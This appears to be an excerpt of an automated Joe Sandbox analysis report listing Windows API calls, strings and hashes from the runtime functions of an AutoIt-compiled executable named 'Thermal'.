                                                      • Instruction Fuzzy Hash: 6CA17C72408301BFD7269F64DC48A6BBBA9FF89321F500B19F9A2965E0D731D984CF52
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?), ref: 00123072
                                                      • DeleteObject.GDI32(00000000), ref: 001230B8
                                                      • DeleteObject.GDI32(00000000), ref: 001230C3
                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 001230CE
                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 001230D9
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0015C77C
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0015C7B5
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0015CBDE
                                                        • Part of subcall function 00121F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00122412,?,00000000,?,?,?,?,00121AA7,00000000,?), ref: 00121F76
                                                      • SendMessageW.USER32(?,00001053), ref: 0015CC1B
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0015CC32
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0015CC48
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0015CC53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 464785882-4108050209
                                                      • Opcode ID: 6fc83de00bf514b3ad0fea70ad66d6c3a40a3523b2bce168b9780a3905c49da5
                                                      • Instruction ID: dca4551b70d65895d059a1835b1c7a436a52c1fedab9a0dad6132ea72fa625d6
                                                      • Opcode Fuzzy Hash: 6fc83de00bf514b3ad0fea70ad66d6c3a40a3523b2bce168b9780a3905c49da5
                                                      • Instruction Fuzzy Hash: CE128E30604311EFDB25CF24D884BAABBA1BF18301F144669F965CF662D731ED99CBA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 2660009612-1645009161
                                                      • Opcode ID: c492c7cf885805c5924325c6fcf07790dfdfff624b98362fbbf8ce8c7cac4068
                                                      • Instruction ID: 30180d25d677b1fa05f7ee9b08dd38d76f0f8a4178b323dc4ddb9bfd8dd28c1b
                                                      • Opcode Fuzzy Hash: c492c7cf885805c5924325c6fcf07790dfdfff624b98362fbbf8ce8c7cac4068
                                                      • Instruction Fuzzy Hash: 17A1CF31A00209BBCB24FF60DC52FBE37B8AF55740F104069F915AB2A2EB719E51D790
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00197BC8
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00197C87
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00197CC5
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00197CD7
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00197D1D
                                                      • GetClientRect.USER32(00000000,?), ref: 00197D29
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00197D6D
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00197D7C
                                                      • GetStockObject.GDI32(00000011), ref: 00197D8C
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00197D90
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00197DA0
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00197DA9
                                                      • DeleteDC.GDI32(00000000), ref: 00197DB2
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00197DDE
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00197DF5
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00197E30
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00197E44
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00197E55
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00197E85
                                                      • GetStockObject.GDI32(00000011), ref: 00197E90
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00197E9B
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00197EA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: e1c5864508c007017e16eaaf5677ae781d54edb21ae38dff727ccd6ae885a486
                                                      • Instruction ID: 4b3b5c80cbf8edc34eb25e135f73611688ee3d14c3ff5468d5a5914bb2bf8272
                                                      • Opcode Fuzzy Hash: e1c5864508c007017e16eaaf5677ae781d54edb21ae38dff727ccd6ae885a486
                                                      • Instruction Fuzzy Hash: DCA15F71A00615BFEB159BA4DC8AFAF7B79EB08750F044214FA15AB6E0C770AD40CB64
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0018B361
                                                      • GetDriveTypeW.KERNEL32(?,001B2C4C,?,\\.\,001B0980), ref: 0018B43E
                                                      • SetErrorMode.KERNEL32(00000000,001B2C4C,?,\\.\,001B0980), ref: 0018B59C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: ecf9e51dcdf810e549e630439ac970bacaaa13ab5dcf68f1a89ab2bbc5e890de
                                                      • Instruction ID: 4ec68ca94155aaf851721d58d095bdfec58bdeaf76d168daeac901b078585eb3
                                                      • Opcode Fuzzy Hash: ecf9e51dcdf810e549e630439ac970bacaaa13ab5dcf68f1a89ab2bbc5e890de
                                                      • Instruction Fuzzy Hash: 2B517030B4C609EBCB04FB60C9C2ABD77A1AB54740B268116E407A77A1DB71AF41DF59
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 001AA0F7
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 001AA1B0
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 001AA1CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0
                                                      • API String ID: 2326795674-4108050209
                                                      • Opcode ID: 9c6c20905b5dc9c231d6deee1dcdd782c7ab8196bca59362e79b45e0b507df56
                                                      • Instruction ID: 1e56254a3666e1af0cd6a4ae52147c431003809dbad1ff8790c71ba00b1cb385
                                                      • Opcode Fuzzy Hash: 9c6c20905b5dc9c231d6deee1dcdd782c7ab8196bca59362e79b45e0b507df56
                                                      • Instruction Fuzzy Hash: ED020078108301AFEB25CF14C848BABBBE4FF8A314F48861DF999962A1C775D954CF52
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 001AAF51
                                                      • SetTextColor.GDI32(?,?), ref: 001AAF55
                                                      • GetSysColorBrush.USER32(0000000F), ref: 001AAF6B
                                                      • GetSysColor.USER32(0000000F), ref: 001AAF76
                                                      • CreateSolidBrush.GDI32(?), ref: 001AAF7B
                                                      • GetSysColor.USER32(00000011), ref: 001AAF93
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 001AAFA1
                                                      • SelectObject.GDI32(?,00000000), ref: 001AAFB2
                                                      • SetBkColor.GDI32(?,00000000), ref: 001AAFBB
                                                      • SelectObject.GDI32(?,?), ref: 001AAFC8
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 001AAFE7
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001AAFFE
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 001AB013
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001AB05F
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001AB086
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 001AB0A4
                                                      • DrawFocusRect.USER32(?,?), ref: 001AB0AF
                                                      • GetSysColor.USER32(00000011), ref: 001AB0BD
                                                      • SetTextColor.GDI32(?,00000000), ref: 001AB0C5
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 001AB0D9
                                                      • SelectObject.GDI32(?,001AAC1F), ref: 001AB0F0
                                                      • DeleteObject.GDI32(?), ref: 001AB0FB
                                                      • SelectObject.GDI32(?,?), ref: 001AB101
                                                      • DeleteObject.GDI32(?), ref: 001AB106
                                                      • SetTextColor.GDI32(?,?), ref: 001AB10C
                                                      • SetBkColor.GDI32(?,?), ref: 001AB116
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: c56eb8ac8437e28da7adb51a8103d9c62739df29eff1bbd5152b4a59cf79c7d2
                                                      • Instruction ID: 7f9696dc77e021fed51cc57bb6b1167721e1d54fca03900baebd2776ce16323c
                                                      • Opcode Fuzzy Hash: c56eb8ac8437e28da7adb51a8103d9c62739df29eff1bbd5152b4a59cf79c7d2
                                                      • Instruction Fuzzy Hash: B7616B71900218BFDF169FA8DC48AAFBB79EF09320F118215F915AB2A1D775D980CF90
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001A90EA
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A90FB
                                                      • CharNextW.USER32(0000014E), ref: 001A912A
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001A916B
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001A9181
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A9192
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 001A91AF
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 001A91FB
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 001A9211
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A9242
                                                      • _memset.LIBCMT ref: 001A9267
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 001A92B0
                                                      • _memset.LIBCMT ref: 001A930F
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001A9339
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 001A9391
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 001A943E
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001A9460
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001A94AA
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001A94D7
                                                      • DrawMenuBar.USER32(?), ref: 001A94E6
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 001A950E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: bd55da49be845616bea8ca7260c67c25bc36d70ee7062a6d08b4b7e39ff458fb
                                                      • Instruction ID: df1c09050e4c3ced1368313a4b0d7f4ca8351944a6b0cd4f1175dbeca6ce0468
                                                      • Opcode Fuzzy Hash: bd55da49be845616bea8ca7260c67c25bc36d70ee7062a6d08b4b7e39ff458fb
                                                      • Instruction Fuzzy Hash: 22E1AF78900218AFDF219F51CC89EEF7BB8EF1A750F108156F915AA291D7708AC1DF61
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 001A5007
                                                      • GetDesktopWindow.USER32 ref: 001A501C
                                                      • GetWindowRect.USER32(00000000), ref: 001A5023
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001A5085
                                                      • DestroyWindow.USER32(?), ref: 001A50B1
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001A50DA
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001A50F8
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001A511E
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 001A5133
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001A5146
                                                      • IsWindowVisible.USER32(?), ref: 001A5166
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 001A5181
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 001A5195
                                                      • GetWindowRect.USER32(?,?), ref: 001A51AD
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 001A51D3
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 001A51ED
                                                      • CopyRect.USER32(?,?), ref: 001A5204
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 001A526F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 6854c7eb1fe3de6a56c9930abf7281b7ecb76254a68269c07ecf2e3bb02fd6ee
                                                      • Instruction ID: 024ca9563c88aff6b51236ce3f4a1011a18558299d964fbd725c439b4472ace5
                                                      • Opcode Fuzzy Hash: 6854c7eb1fe3de6a56c9930abf7281b7ecb76254a68269c07ecf2e3bb02fd6ee
                                                      • Instruction Fuzzy Hash: 69B1A970608700AFDB04DF64D984B6BBBE6FF89310F008A1DF5999B291DB71E845CB92
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0018499C
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001849C2
                                                      • _wcscpy.LIBCMT ref: 001849F0
                                                      • _wcscmp.LIBCMT ref: 001849FB
                                                      • _wcscat.LIBCMT ref: 00184A11
                                                      • _wcsstr.LIBCMT ref: 00184A1C
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00184A38
                                                      • _wcscat.LIBCMT ref: 00184A81
                                                      • _wcscat.LIBCMT ref: 00184A88
                                                      • _wcsncpy.LIBCMT ref: 00184AB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: 7d9ee2241e0935a0355f14ba6b84930399906a58f4eaf67ddcf5051522bb178b
                                                      • Instruction ID: 98306259092e163c666dca7d7d24701b227851ad388b25370aea324ea866c755
                                                      • Opcode Fuzzy Hash: 7d9ee2241e0935a0355f14ba6b84930399906a58f4eaf67ddcf5051522bb178b
                                                      • Instruction Fuzzy Hash: 6E411872604205BBDB15B7708C43EBF7BACDF55720F000159F905A71A2EF34EA419BA5
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00122C8C
                                                      • GetSystemMetrics.USER32(00000007), ref: 00122C94
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00122CBF
                                                      • GetSystemMetrics.USER32(00000008), ref: 00122CC7
                                                      • GetSystemMetrics.USER32(00000004), ref: 00122CEC
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00122D09
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00122D19
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00122D4C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00122D60
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00122D7E
                                                      • GetStockObject.GDI32(00000011), ref: 00122D9A
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00122DA5
                                                        • Part of subcall function 00122714: GetCursorPos.USER32(?), ref: 00122727
                                                        • Part of subcall function 00122714: ScreenToClient.USER32(001E77B0,?), ref: 00122744
                                                        • Part of subcall function 00122714: GetAsyncKeyState.USER32(00000001), ref: 00122769
                                                        • Part of subcall function 00122714: GetAsyncKeyState.USER32(00000002), ref: 00122777
                                                      • SetTimer.USER32(00000000,00000000,00000028,001213C7), ref: 00122DCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: 1ff7683f75de36e12514d9dfa5aae9202ab7ebdc53bd8563b77e5e75060666aa
                                                      • Instruction ID: 8914fbced615511a0ecb78827b451bdd840bec6208808f4dbe9e65c7771de473
                                                      • Opcode Fuzzy Hash: 1ff7683f75de36e12514d9dfa5aae9202ab7ebdc53bd8563b77e5e75060666aa
                                                      • Instruction Fuzzy Hash: 10B17F71A0021AEFDB15DFA8EC89FAE77B4FB18311F114225FA15AB690DB70A850CF50
                                                      APIs
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • GetForegroundWindow.USER32(001B0980,?,?,?,?,?), ref: 001404E3
                                                      • IsWindow.USER32(?), ref: 001766BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Foreground_memmove
                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                      • API String ID: 3828923867-1919597938
                                                      • Opcode ID: 6474676bb0f51a6b7abf46993a3e74b8ee94db7513d93d4a1e2775e209c63167
                                                      • Instruction ID: fa03d3783b6f5b6285a4a21e9c77990d7d0fa22b750b3fecb83bd34a6d413c46
                                                      • Opcode Fuzzy Hash: 6474676bb0f51a6b7abf46993a3e74b8ee94db7513d93d4a1e2775e209c63167
                                                      • Instruction Fuzzy Hash: 4FD1F570104B02EFCB09EF60C48199ABBB5BF68344F508A1DF599576A2DB30F959CB92
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 001A44AC
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001A456C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 3974292440-719923060
                                                      • Opcode ID: 98b8144ed90426c64df1422e5ba51fb74d3deaff55e4d36acc1e0af06434ef00
